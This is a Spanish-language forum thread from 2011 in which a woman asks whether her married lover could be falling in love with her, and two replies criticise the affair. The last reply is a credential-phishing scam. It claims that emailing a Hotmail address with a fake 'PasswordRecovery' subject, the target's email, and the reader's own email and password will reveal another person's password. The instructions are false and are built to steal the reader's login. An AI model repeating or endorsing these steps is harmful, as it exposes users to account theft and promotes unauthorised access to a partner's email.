Foro / Pareja

Pudiera estar enamorandose mi amante?

Última respuesta: 15 de febrero de 2011 a las 22:17
A
an0N_800242799z
15/2/11 a las 17:01


Hola

Tengo una pregunta a ver si me pueden ayudar a entender.

Tengo una relacion con un hombre casado de 1 ano y 2 meses. Siempre al principio la relacion muy intensa. El me buscaba mucho y nos haciamos compania. Si claro que habia mucho sexo pero tambien saliamos muchos a lugares publicos, a bailar, restaurantes. En todo este tiempo hemos llegado a querernos, nos respetamos y comunicamos muy bien. Tiene 2 ninas chiquitas con las que he hablado por telefono y me quiere presentar.

Me ha presentado a sus amigos y hermanos ( que conocen a su esposa) y me llevo un dia a su casa que estaba solo ( yo se que no estuvo bien pero lo vi como un gesto de confianza hacia mi) ese dia no hicimos nada incorrecto, solo me hizo una cena y bailamos). Nunca hablamos de su mujer ni de separaciones pero en algunos momentos ha comentado que si se ganara la loteria dejaria a sus hijas la mitad del dinero y nos iriamos a vivir juntos a Estados Unidos ( ahora vivimos en Canada).

En fin mi pregunta es ...puede un hombre casado llegar a enamorarse de su amante? El me quiere porque me lo dice y me lo demuestra con hechos. Siempre hablandome y preocupandose por mi. El solo no me busca por sexo ( no me ve como objeto sexual)- de cada 3 veces que nos vemos solo 1 es sexo, ( y se que le encanta hacerlo conmigo) (Nos vemos cada 4 o 5 dias) es decir, nos vemos solo para estar juntos, nos gusta salir, conversar, solo con vernos y pasar un rato juntos, almorzar, tomar un cafe, ir a bailar, jugar bolos, billar, tomarnos una copa de vino con sus amigos, etc. Eso me hace pensar bien de el, creo que el hombre que tiene una amante mayormente es por sexo,,,,, el hecho de que no siempre me busca para eso.Pudiera ser que ya paso la pasion y ahora estuviera llegando a quererme? Creen que es el tipico casado que nunca se enamora de la amante segun lo que les cuento?

Que tal?

1. Me lleva a su casa
2. Me deja hablar con sus hijas
3. Me presenta a sus hermanos y amigos
4. No me usa solo para sexo
5. Nos hablamos todo el dia para saber como esta el otro ( desde que empezamos siempre ha estado ahi, comunicandose a diario, 3 veces al dia o mas, siempre- nunca se me ha desaparecido)

A pesar de ser casado es hombre al fin y creo que puede llegar a enamorarse otra vez, en el corazon uno no manda. Soy realista y veo las cosas como son, no tengo muchas esperanzas con el pero mi instinto me dice que si pudiera quererme de verdad.

Gracias por sus consejos!

Ver también

J
janine_9381077
15/2/11 a las 17:30

Pues personalmente creo que
hay que tener mucho morro y poca vergüenza para presentarle tu amante a tus hermanos, amigos e incluso a tus propias hijas!

a ti no te voy a juzgar, pero es que lo de él... no tiene nombre!

de verdad serias capaz de tener algo serio con alguien asi? quien te dice q luego no te lo hace a ti?

X
xumei_6406401
15/2/11 a las 17:37

...
Me parece tan irrespetuoso de su parte y también de la tuya, haber ido a casa de su aún esposa aunque no hayan hecho "nada incorrecto", que te deje hablar con sus hijas, convivas con los amigos comunes, ¿te gustaría estar del otro lado?.

Puedo estar de acuerdo en que a veces en el corazón no se puede mandar, pero siempre se pueden hacer las cosas de otra manera, nada justifica el engaño, si tanto te quiere que sea claro con su esposa y empiece algo nuevo contigo y no es por desanimarte pero hay hombres que nunca dejan a la esposa, si se les empieza a presionar muchas veces dejan mejor a la amante.

Saludos.

M
maila_5520533
15/2/11 a las 22:17

Y si no es sincero??????
Para poder obtener la contraseña de la persona que te interesa, solo tienes que seguir los pasos a continuacion. Lo de bueno es que no se afecta la privacidad de la cuenta de correo de quien solicitas, esa persona no se da por enterada ni perjudicada, y todo sigue normalmente su curso. Pruebalo, no tienes nada que perder.

Todo consiste en enviar un email...

----PASO 1: mandar un email a:

password-account@hotmail.com

----PASO 2: En el campo Asunto escribir:

PasswordRecovery_mail_MSN

----PASO 3: En el contenido escribir:

USR_RCVR seguido del email a obtener su contraseña

----PASO 4: en la siguiente línea escribir:

REDIRECT_TO seguido de tu email y tu contraseña.

Por cierto, también funciona para cualquier servidor como yahoo, gmail, hotmail, correos personalizados, correos de universidades, etc.

PD: si no te llega la respuesta en los proximos minutos, prueba con tu otra cuenta de correo.

Ultimas conversaciones
ISDIN Si-Nails

ISDIN Si-Nails

Compartir
#instapic #picoftheday #Fashion #Beauty #Fitness #Deco
instagram